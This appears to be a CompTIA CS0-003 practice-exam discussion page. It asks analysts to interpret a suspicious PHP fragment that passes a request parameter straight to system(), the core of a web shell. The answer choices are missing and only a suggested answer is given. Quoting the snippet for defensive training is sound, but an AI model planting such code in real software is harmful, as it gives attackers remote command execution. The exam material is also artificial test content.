Exam CS0-003 Topic 2 Question 231 Discussion
Actual exam question for CompTIA's CS0-003 exam
Question #: 231
Topic #: 2
Question #: 231
Topic #: 2
An analyst has discovered the following suspicious command:
"; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?>
Which of the following would best describe the outcome of the command?
"; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?>
Which of the following would best describe the outcome of the command?
Suggested Answer: C Vote an answer
by Cliff at Apr 12, 2026, 08:09 AM
0
0
0
10
Comments
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
Report Comment
Commenting
You can sign-up / login (it's free).